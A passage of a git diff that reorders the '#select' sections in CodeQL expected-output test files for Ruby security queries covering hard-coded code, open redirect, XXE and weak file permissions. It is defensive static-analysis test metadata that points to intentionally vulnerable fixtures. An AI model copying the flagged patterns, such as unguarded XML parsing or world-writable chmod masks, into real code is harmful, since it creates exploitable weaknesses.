call to readlines | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | value from stdin | diff --git a/ruby/ql/test/query-tests/security/cwe-506/HardcodedDataInterpretedAsCode.expected b/ruby/ql/test/query-tests/security/cwe-506/HardcodedDataInterpretedAsCode.expected index fe3a1d20a041..2935e15cbd6e 100644 --- a/ruby/ql/test/query-tests/security/cwe-506/HardcodedDataInterpretedAsCode.expected +++ b/ruby/ql/test/query-tests/security/cwe-506/HardcodedDataInterpretedAsCode.expected @@ -1,7 +1,3 @@ -#select -| tst.rb:7:6:7:31 | call to e | tst.rb:5:27:5:72 | "707574732822636f646520696e6a6..." : String | tst.rb:7:6:7:31 | call to e | $@ is interpreted as code. | tst.rb:5:27:5:72 | "707574732822636f646520696e6a6..." | Hard-coded data | -| tst.rb:10:9:10:25 | call to e | tst.rb:10:11:10:24 | "666f6f626172" : String | tst.rb:10:9:10:25 | call to e | $@ is interpreted as an import path. | tst.rb:10:11:10:24 | "666f6f626172" | Hard-coded data | -| tst.rb:17:6:17:38 | call to strip | tst.rb:16:31:16:84 | "\\x70\\x75\\x74\\x73\\x28\\x27\\x68\\..." : String | tst.rb:17:6:17:38 | call to strip | $@ is interpreted as code. | tst.rb:16:31:16:84 | "\\x70\\x75\\x74\\x73\\x28\\x27\\x68\\..." | Hard-coded data | edges | tst.rb:1:7:1:7 | r : String | tst.rb:2:4:2:4 | r : String | provenance | | | tst.rb:2:3:2:5 | call to [] : Array [element 0] : String | tst.rb:2:3:2:15 | call to pack | provenance | Config | @@ -33,3 +29,7 @@ nodes subpaths | tst.rb:7:8:7:30 | totally_harmless_string : String | tst.rb:1:7:1:7 | r : String | tst.rb:2:3:2:15 | call to pack | tst.rb:7:6:7:31 | call to e | | tst.rb:10:11:10:24 | "666f6f626172" : String | tst.rb:1:7:1:7 | r : String | tst.rb:2:3:2:15 | call to pack | tst.rb:10:9:10:25 | call to e | +#select +| tst.rb:7:6:7:31 | call to e | tst.rb:5:27:5:72 | "707574732822636f646520696e6a6..." : String | tst.rb:7:6:7:31 | call to e | $@ is interpreted as code. | tst.rb:5:27:5:72 | "707574732822636f646520696e6a6..." | Hard-coded data | +| tst.rb:10:9:10:25 | call to e | tst.rb:10:11:10:24 | "666f6f626172" : String | tst.rb:10:9:10:25 | call to e | $@ is interpreted as an import path. | tst.rb:10:11:10:24 | "666f6f626172" | Hard-coded data | +| tst.rb:17:6:17:38 | call to strip | tst.rb:16:31:16:84 | "\\x70\\x75\\x74\\x73\\x28\\x27\\x68\\..." : String | tst.rb:17:6:17:38 | call to strip | $@ is interpreted as code. | tst.rb:16:31:16:84 | "\\x70\\x75\\x74\\x73\\x28\\x27\\x68\\..." | Hard-coded data | diff --git a/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.expected b/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.expected index 7df096e2d2fa..cd2845ea7a56 100644 --- a/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.expected +++ b/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.expected @@ -1,14 +1,3 @@ -#select -| UrlRedirect.rb:4:17:4:22 | call to params | UrlRedirect.rb:4:17:4:22 | call to params | UrlRedirect.rb:4:17:4:22 | call to params | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:4:17:4:22 | call to params | user-provided value | -| UrlRedirect.rb:9:17:9:28 | ...[...] | UrlRedirect.rb:9:17:9:22 | call to params | UrlRedirect.rb:9:17:9:28 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:9:17:9:22 | call to params | user-provided value | -| UrlRedirect.rb:14:17:14:43 | call to fetch | UrlRedirect.rb:14:17:14:22 | call to params | UrlRedirect.rb:14:17:14:43 | call to fetch | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:14:17:14:22 | call to params | user-provided value | -| UrlRedirect.rb:19:17:19:37 | call to to_unsafe_hash | UrlRedirect.rb:19:17:19:22 | call to params | UrlRedirect.rb:19:17:19:37 | call to to_unsafe_hash | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:19:17:19:22 | call to params | user-provided value | -| UrlRedirect.rb:24:17:24:37 | call to filter_params | UrlRedirect.rb:24:31:24:36 | call to params | UrlRedirect.rb:24:17:24:37 | call to filter_params | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:24:31:24:36 | call to params | user-provided value | -| UrlRedirect.rb:34:17:34:37 | "#{...}/foo" | UrlRedirect.rb:34:20:34:25 | call to params | UrlRedirect.rb:34:17:34:37 | "#{...}/foo" | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:34:20:34:25 | call to params | user-provided value | -| UrlRedirect.rb:58:17:58:28 | ...[...] | UrlRedirect.rb:58:17:58:22 | call to params | UrlRedirect.rb:58:17:58:28 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:58:17:58:22 | call to params | user-provided value | -| UrlRedirect.rb:63:38:63:49 | ...[...] | UrlRedirect.rb:63:38:63:43 | call to params | UrlRedirect.rb:63:38:63:49 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:63:38:63:43 | call to params | user-provided value | -| UrlRedirect.rb:68:38:68:49 | ...[...] | UrlRedirect.rb:68:38:68:43 | call to params | UrlRedirect.rb:68:38:68:49 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:68:38:68:43 | call to params | user-provided value | -| UrlRedirect.rb:73:25:73:36 | ...[...] | UrlRedirect.rb:73:25:73:30 | call to params | UrlRedirect.rb:73:25:73:36 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:73:25:73:30 | call to params | user-provided value | edges | UrlRedirect.rb:9:17:9:22 | call to params | UrlRedirect.rb:9:17:9:28 | ...[...] | provenance | | | UrlRedirect.rb:14:17:14:22 | call to params | UrlRedirect.rb:14:17:14:43 | call to fetch | provenance | | @@ -51,3 +40,14 @@ nodes | UrlRedirect.rb:94:5:94:29 | call to permit | semmle.label | call to permit | subpaths | UrlRedirect.rb:24:31:24:36 | call to params | UrlRedirect.rb:93:21:93:32 | input_params | UrlRedirect.rb:94:5:94:29 | call to permit | UrlRedirect.rb:24:17:24:37 | call to filter_params | +#select +| UrlRedirect.rb:4:17:4:22 | call to params | UrlRedirect.rb:4:17:4:22 | call to params | UrlRedirect.rb:4:17:4:22 | call to params | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:4:17:4:22 | call to params | user-provided value | +| UrlRedirect.rb:9:17:9:28 | ...[...] | UrlRedirect.rb:9:17:9:22 | call to params | UrlRedirect.rb:9:17:9:28 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:9:17:9:22 | call to params | user-provided value | +| UrlRedirect.rb:14:17:14:43 | call to fetch | UrlRedirect.rb:14:17:14:22 | call to params | UrlRedirect.rb:14:17:14:43 | call to fetch | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:14:17:14:22 | call to params | user-provided value | +| UrlRedirect.rb:19:17:19:37 | call to to_unsafe_hash | UrlRedirect.rb:19:17:19:22 | call to params | UrlRedirect.rb:19:17:19:37 | call to to_unsafe_hash | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:19:17:19:22 | call to params | user-provided value | +| UrlRedirect.rb:24:17:24:37 | call to filter_params | UrlRedirect.rb:24:31:24:36 | call to params | UrlRedirect.rb:24:17:24:37 | call to filter_params | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:24:31:24:36 | call to params | user-provided value | +| UrlRedirect.rb:34:17:34:37 | "#{...}/foo" | UrlRedirect.rb:34:20:34:25 | call to params | UrlRedirect.rb:34:17:34:37 | "#{...}/foo" | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:34:20:34:25 | call to params | user-provided value | +| UrlRedirect.rb:58:17:58:28 | ...[...] | UrlRedirect.rb:58:17:58:22 | call to params | UrlRedirect.rb:58:17:58:28 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:58:17:58:22 | call to params | user-provided value | +| UrlRedirect.rb:63:38:63:49 | ...[...] | UrlRedirect.rb:63:38:63:43 | call to params | UrlRedirect.rb:63:38:63:49 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:63:38:63:43 | call to params | user-provided value | +| UrlRedirect.rb:68:38:68:49 | ...[...] | UrlRedirect.rb:68:38:68:43 | call to params | UrlRedirect.rb:68:38:68:49 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:68:38:68:43 | call to params | user-provided value | +| UrlRedirect.rb:73:25:73:36 | ...[...] | UrlRedirect.rb:73:25:73:30 | call to params | UrlRedirect.rb:73:25:73:36 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:73:25:73:30 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/Xxe.expected b/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/Xxe.expected index 787038e80f2b..d819e92c9305 100644 --- a/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/Xxe.expected +++ b/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/Xxe.expected @@ -1,8 +1,3 @@ -#select -| LibXmlBackend.rb:18:30:18:36 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:18:30:18:36 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | -| LibXmlBackend.rb:19:19:19:25 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:19:19:19:25 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | -| LibXmlBackend.rb:20:27:20:33 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:20:27:20:33 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | -| LibXmlBackend.rb:21:34:21:40 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:21:34:21:40 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | edges | LibXmlBackend.rb:16:5:16:11 | content | LibXmlBackend.rb:18:30:18:36 | content | provenance | | | LibXmlBackend.rb:16:5:16:11 | content | LibXmlBackend.rb:19:19:19:25 | content | provenance | | @@ -19,3 +14,8 @@ nodes | LibXmlBackend.rb:20:27:20:33 | content | semmle.label | content | | LibXmlBackend.rb:21:34:21:40 | content | semmle.label | content | subpaths +#select +| LibXmlBackend.rb:18:30:18:36 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:18:30:18:36 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | +| LibXmlBackend.rb:19:19:19:25 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:19:19:19:25 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | +| LibXmlBackend.rb:20:27:20:33 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:20:27:20:33 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | +| LibXmlBackend.rb:21:34:21:40 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:21:34:21:40 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-611/xxe/Xxe.expected b/ruby/ql/test/query-tests/security/cwe-611/xxe/Xxe.expected index d6f2cdb6d2ac..44acc636b600 100644 --- a/ruby/ql/test/query-tests/security/cwe-611/xxe/Xxe.expected +++ b/ruby/ql/test/query-tests/security/cwe-611/xxe/Xxe.expected @@ -1,27 +1,3 @@ -#select -| LibXmlRuby.rb:4:34:4:40 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:4:34:4:40 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:5:32:5:38 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:5:32:5:38 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:6:30:6:36 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:6:30:6:36 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:7:32:7:38 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:7:32:7:38 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:8:30:8:36 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:8:30:8:36 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:9:28:9:34 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:9:28:9:34 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:11:26:11:32 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:11:26:11:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| LibXmlRuby.rb:12:24:12:30 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:12:24:12:30 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:5:26:5:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:5:26:5:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:6:26:6:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:6:26:6:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:7:26:7:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:7:26:7:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:8:26:8:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:8:26:8:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:9:26:9:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:9:26:9:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:11:26:11:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:11:26:11:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:12:26:12:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:12:26:12:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:15:26:15:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:15:26:15:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:16:26:16:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:16:26:16:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:18:26:18:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:18:26:18:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:19:26:19:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:19:26:19:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:22:26:22:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:22:26:22:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:25:26:25:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:25:26:25:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:27:26:27:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:27:26:27:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | -| Nokogiri.rb:28:26:28:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:28:26:28:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | edges | LibXmlRuby.rb:3:5:3:11 | content | LibXmlRuby.rb:4:34:4:40 | content | provenance | | | LibXmlRuby.rb:3:5:3:11 | content | LibXmlRuby.rb:5:32:5:38 | content | provenance | | @@ -81,3 +57,27 @@ nodes | Nokogiri.rb:27:26:27:32 | content | semmle.label | content | | Nokogiri.rb:28:26:28:32 | content | semmle.label | content | subpaths +#select +| LibXmlRuby.rb:4:34:4:40 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:4:34:4:40 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:5:32:5:38 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:5:32:5:38 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:6:30:6:36 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:6:30:6:36 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:7:32:7:38 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:7:32:7:38 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:8:30:8:36 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:8:30:8:36 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:9:28:9:34 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:9:28:9:34 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:11:26:11:32 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:11:26:11:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:12:24:12:30 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:12:24:12:30 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:5:26:5:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:5:26:5:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:6:26:6:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:6:26:6:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:7:26:7:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:7:26:7:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:8:26:8:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:8:26:8:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:9:26:9:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:9:26:9:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:11:26:11:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:11:26:11:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:12:26:12:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:12:26:12:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:15:26:15:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:15:26:15:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:16:26:16:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:16:26:16:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:18:26:18:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:18:26:18:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:19:26:19:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:19:26:19:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:22:26:22:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:22:26:22:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:25:26:25:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:25:26:25:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:27:26:27:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:27:26:27:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:28:26:28:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:28:26:28:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-732/WeakFilePermissions.expected b/ruby/ql/test/query-tests/security/cwe-732/WeakFilePermissions.expected index f56d7886c572..802e76f63a50 100644 --- a/ruby/ql/test/query-tests/security/cwe-732/WeakFilePermissions.expected +++ b/ruby/ql/test/query-tests/security/cwe-732/WeakFilePermissions.expected @@ -1,15 +1,3 @@ -#select -| FilePermissions.rb:5:19:5:22 | 0222 | FilePermissions.rb:5:19:5:22 | 0222 | FilePermissions.rb:5:19:5:22 | 0222 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:5:3:5:32 | call to chmod | call to chmod | -| FilePermissions.rb:7:19:7:22 | 0622 | FilePermissions.rb:7:19:7:22 | 0622 | FilePermissions.rb:7:19:7:22 | 0622 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:7:3:7:32 | call to chmod | call to chmod | -| FilePermissions.rb:9:19:9:22 | 0755 | FilePermissions.rb:9:19:9:22 | 0755 | FilePermissions.rb:9:19:9:22 | 0755 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:9:3:9:32 | call to chmod | call to chmod | -| FilePermissions.rb:11:19:11:22 | 0777 | FilePermissions.rb:11:19:11:22 | 0777 | FilePermissions.rb:11:19:11:22 | 0777 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:11:3:11:32 | call to chmod | call to chmod | -| FilePermissions.rb:28:13:28:16 | 0755 | FilePermissions.rb:28:13:28:16 | 0755 | FilePermissions.rb:28:13:28:16 | 0755 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:28:3:28:26 | call to chmod | call to chmod | -| FilePermissions.rb:51:10:51:13 | 0777 | FilePermissions.rb:51:10:51:13 | 0777 : Integer | FilePermissions.rb:53:19:53:22 | perm | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:53:3:53:32 | call to chmod | call to chmod | -| FilePermissions.rb:51:10:51:13 | 0777 | FilePermissions.rb:51:10:51:13 | 0777 : Integer | FilePermissions.rb:56:19:56:23 | perm2 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:56:3:56:33 | call to chmod | call to chmod | -| FilePermissions.rb:58:10:58:26 | "u=wrx,g=rwx,o=x" | FilePermissions.rb:58:10:58:26 | "u=wrx,g=rwx,o=x" : String | FilePermissions.rb:61:19:61:23 | perm2 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:61:3:61:33 | call to chmod | call to chmod | -| FilePermissions.rb:63:19:63:29 | "u=rwx,o+r" | FilePermissions.rb:63:19:63:29 | "u=rwx,o+r" | FilePermissions.rb:63:19:63:29 | "u=rwx,o+r" | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:63:3:63:39 | call to chmod | call to chmod | -| FilePermissions.rb:67:19:67:24 | "a+rw" | FilePermissions.rb:67:19:67:24 | "a+rw" | FilePermissions.rb:67:19:67:24 | "a+rw" | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:67:3:67:34 | call to chmod | call to chmod | -| FilePermissions.rb:72:21:72:24 | 0755 | FilePermissions.rb:72:21:72:24 | 0755 | FilePermissions.rb:72:21:72:24 | 0755 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:72:3:72:34 | call to chmod_R | call to chmod_R | edges | FilePermissions.rb:51:3:51:6 | perm : Integer | FilePermissions.rb:53:19:53:22 | perm | provenance | | | FilePermissions.rb:51:3:51:6 | perm : Integer | FilePermissions.rb:54:3:54:7 | perm2 : Integer | provenance | | @@ -37,3 +25,15 @@ nodes | FilePermissions.rb:67:19:67:24 | "a+rw" | semmle.label | "a+rw" | | FilePermissions.rb:72:21:72:24 | 0755 | semmle.label | 0755 | subpaths +#select +| FilePermissions.rb:5:19:5:22 | 0222 | FilePermissions.rb:5:19:5:22 | 0222 | FilePermissions.rb:5:19:5:22 | 0222 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:5:3:5:32 | call to chmod | call to chmod | +| FilePermissions.rb:7:19:7:22 | 0622 | FilePermissions.rb:7:19:7:22 | 0622 | FilePermissions.rb:7:19:7:22 | 0622 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:7:3:7:32 | call to chmod | call to chmod | +| FilePermissions.rb:9:19:9:22 | 0755 | FilePermissions.rb:9:19:9:22 | 0755 | FilePermissions.rb:9:19:9:22 | 0755 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:9:3:9:32 | call to chmod | call to chmod | +| FilePermissions.rb:11:19:11:22 | 0777 | FilePermissions.rb:11:19:11:22 | 0777 | FilePermissions.rb:11:19:11:22 | 0777 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:11:3:11:32 | call to chmod | call to chmod | +| FilePermissions.rb:28:13:28:16 | 0755 | FilePermissions.rb:28:13:28:16 | 0755 | FilePermissions.rb:28:13:28:16 | 0755 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:28:3:28:26 | call to chmod | call to chmod | +| FilePermissions.rb:51:10:51:13 | 0777 | FilePermissions.rb:51:10:51:13 | 0777 : Integer | FilePermissions.rb:53:19:53:22 | perm | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:53:3:53:32 | call to chmod | call to chmod | +| FilePermissions.rb:51:10:51:13 | 0777 | FilePermissions.rb:51:10:51:13 | 0777 : Integer | FilePermissions.rb:56:19:56:23 | perm2 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:56:3:56:33 | call to chmod | call to chmod | +| FilePermissions.rb:58:10:58:26 | "u=wrx,g=rwx,o=x" | FilePermissions.rb:58:10:58:26 | "u=wrx,g=rwx,o=x" : String | FilePermissions.rb:61:19:61:23 | perm2 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:61:3:61:33 | call to chmod | call to chmod | +| FilePermissions.rb:63:19:63:29 | "u=rwx,o+r" | FilePermissions.rb:63:19:63:29 | "u=rwx,o+r" | FilePermissions.rb:63:19:63:29 | "u=rwx,o+r" | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:63:3:63:39 | call to chmod | call to 